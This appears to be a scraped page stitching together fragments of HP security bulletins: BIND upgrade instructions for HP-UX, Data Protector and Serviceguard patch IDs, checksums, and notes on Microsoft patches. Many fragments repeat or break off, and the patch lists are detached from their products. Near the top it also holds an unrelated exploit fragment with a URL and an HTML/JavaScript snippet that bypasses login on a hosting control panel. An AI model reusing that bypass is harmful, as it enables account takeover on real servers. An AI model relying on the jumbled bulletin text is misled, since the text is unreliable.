Next Page >>
actions
The patch PHNE_37865 is available from: http://itrc.hp.com
The BIND v9.3.2 updates are available for download from: http://software.hp.com
HP-UX Release - B.11.11 running v8.1.2
Action - Upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below,
remove "query-source port" and "query-source-v6 port" options in /etc/named.conf.
HP-UX Release - B.11.11 running v9.2.0
BIND Depot name - BIND920v11.depot
MD5 Sum - F6999280DE19645EF86FF52083AACD72
1.1- http://[HC URL]/hosting/addreseller.asp?reseller=[USERNAME] -> for ex. [USERNAME]= resadmin
1.2- Now, to login without changing the password, attacker must run "ChangeDisplay.htm" then redirect to "main.asp"
~~~~~~~~~~~~~~~~1.2.1 ChangeDisplay.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
_action = '/AdminSettings/displays.asp?DecideAction=1&ChangeSkin=1'
frmDisplay.action = window.document.all.URL.value + _action
return true;
}
</script>
URL: <input type="text" name="URL" />
================================================
HP-UX Release - B.11.11 Serviceguard Manager Version - A.05.00
================================================
Depot Name - B8325BA_A.05.02_HP-UX_B.11.11_32_64.depot
Action - Go to SG Mgr A.05.02
Update to Java JDK/JRE 6.0.04 or Java JDK/JRE 5.0.16 or subsequent
================================================
HP-UX Release - B.11.23 Serviceguard Manager Version - A.05.00
================================================
Windows Vista, XP, 2008, 2003, 2000 / OV DP6.11 Win - Core / DPWIN_00475
Windows Vista, XP, 2008, 2003, 2000 / OV DP6.11 Win - Cell Server / DPWIN_00476
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The BIND v9.3.2 updates are available for download from: http://software.hp.com
HP-UX Release - B.11.11 running v8.1.2
Action - Upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below
HP-UX Release - B.11.11 running v9.2.0
BIND Depot name - BIND920v11.depot
MD5 Sum - F6999280DE19645EF86FF52083AACD72
A new BIND v9.2.0 depot is available to address an issue encountered on HP-UX B.11.11. The new depot is available by contacting HP Support.
The patch PHNE_37865 is available from: http://itrc.hp.com
The BIND v9.3.2 updates are available for download from: http://software.hp.com
HP-UX Release / Action
B.11.11 running v8.1.2
Upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below, remove "query-source port" and "query-source-v6 port" options in /etc/named.conf.
HP-UX Release / BIND Depot name / Action
A new BIND v9.2.0 depot is available to address an issue encountered on HP-UX B.11.11. The new depot is available by contacting HP Support.
The BIND v9.3.2 updates are available for download from: http://software.hp.com
The patch PHNE_37865 is available from: http://itrc.hp.com
HP-UX Release / Action
B.11.11 running v8.1.2 /
Upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below, remove "query-source port" and "query-source-v6 port" options in /etc/named.conf.
HP-UX Release / BIND Depot name / Action
B.11.31 (32-bit) / HPUXWSATW-B233-1131-32-bit
B.11.31 (64-bit) / HPUXWSATW-B233-1131-64-bit
MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v3.15 or subsequent.
Install HP-UX Web Server Suite v2.33 or subsequent.
PRODUCT SPECIFIC INFORMATION
DPWIN_00479
The patches are available for download from
http://support.openview.hp.com/selfsolve/patches
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
HP-UX B.11.23 / 3.5 / (VRTSob) / PHCO_42317 or subsequent
HP-UX B.11.31 / 4.1 / (VRTSob) / PHCO_42316 or subsequent
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check.
HP-UX B.11.31
4.1 / (VRTSob)
PHCO_42316 or subsequent
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
-------------------------------------------------
MS Patch - MS08-041 Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access
Could Allow Remote Code Execution (955617)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue
-------------------------------------------------
MS Patch - MS08-042 Vulnerability in Microsoft Word Could Allow Remote Code Execution (955048)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue
-------------------------------------------------
OS Release - B.11.23
Affected WBEM Services Revision - A.02.00.11
Patch ID - PHSS_38748
MANUAL ACTIONS: Yes - NonUpdate
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
Note: Patch installation instructions are shown at the end of this table.
-------------------------------------------------
MS Patch - MS08-056 Vulnerability in Microsoft Office Could Allow Information Disclosure (957699)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue
-------------------------------------------------
MS Patch - MS08-057 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue
-------------------------------------------------
A.00.09.07m.047
B.11.31 (11i v3)
A.00.09.08j.003
MANUAL ACTIONS: Yes - Update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
A.00.09.07m.050
B.11.31 (11i v3)
A.00.09.08k.003
MANUAL ACTIONS: Yes - Update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
NOTE: Patch installation instructions are shown at the end of this table.
-------------------------------------------------
MS Patch - MS08-003 Vulnerability in Active Directory Could Allow Denial of Service (946538)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue
-------------------------------------------------
MS Patch - MS08-004 Vulnerability in Windows TCP/IP Could Allow Denial of Service (946456)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue
-------------------------------------------------
NOTE: Patch installation instructions are shown at the end of this table.
-------------------------------------------------
MS Patch - MS08-003 Vulnerability in Active Directory Could Allow Denial of Service (946538)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue
-------------------------------------------------
MS Patch - MS08-004 Vulnerability in Windows TCP/IP Could Allow Denial of Service (946456)
Analysis - SMA does not have this component. Patch will not run successfully.
Action - Customers should not be concerned with this issue
-------------------------------------------------
RedHat 4AS-x86_64, RedHat 4ES-x86_64 / OV DP6.10 Linux - Cell Server / DPLNX_00078
The patches are available for download from
http://itrc.hp.com
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security
RedHat 4AS-x86_64, RedHat 4ES-x86_64 / OV DP6.10 Linux - Cell Server / DPLNX_00078
The patches are available for download from
http://itrc.hp.com
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security
Windows 2000/2003/XP
OV DP5.50 (Core)
DPWIN_00359
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
DPWIN_00359
OV DP5.50 (Cell Server)
DPWIN_00208
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security
JRE 1.5.0_20: CVE-2009-2625, CVE-2009-2670, CVE-2009-2671,
CVE-2009-2672, CVE-2009-2673, CVE-2009-2675, CVE-2009-2676,
CVE-2009-2716, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720,
CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
B.11.31 (IA and PA) VRTSvxfs 5.0 PHCO_38913, PHCO_39132
B.11.31 (IA and PA) VRTSodm 5.0 PHKL_39130
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security
application using the newt library.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-2905 to this issue.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
B.11.11 (IPv4 and IPv6) HPUXWST-B219-02-1111.depot 1aa4fb8ff8f76a758931f7ef1d4a7a3e
B.11.23 HPUXWST-B219-02-1123.depot 6b895448c41c75645e24eb4ad2ef3f3b
B.11.31 HPUXWST-B219-02-1131.depot f78d4925ad879d09773c955f393d40cb
MANUAL ACTIONS: Yes - Update plus other actions
Install Apache v2.19 or subsequent which includes PHP v5.2.6 or subsequent
Install Tomcat v5.5.23.01.1 or subsequent which includes PHP v5.2.6 or subsequent
PRODUCT SPECIFIC INFORMATION
B.11.23 A.02.05.08 PHSS_37703
B.11.31 A.02.05.08 PHSS_37704
==========================
MANUAL ACTIONS: Yes - Update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
ITOSOL_00629 Solaris AIX
ITOSOL_00530 Solaris Tru64 Unix
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.22, B.11.23 running TCP/IP (IPv4)
BACKGROUND
To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems, verify that the recommended action has been taken.
AFFECTED VERSIONS
HP-UX B.11.11
=============
HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
===========
OVO-CLT.OVO-UX11-CLT
action: install revision 3.10.040 or subsequent
URL: http://quixy.deu.hp.com/hotfix/d.php?P=lcore&N=SSRT061260+OpenView+Shared+Trace+Service&V=2.1
OVO-CLT.OVO-UXIA-CLT
action: install revision 3.10.040 or subsequent
URL: http://quixy.deu.hp.com/hotfix/d.php?P=lcore&N=SSRT061260+OpenView+Shared+Trace+Service&V=2.1
Next Page>>
|
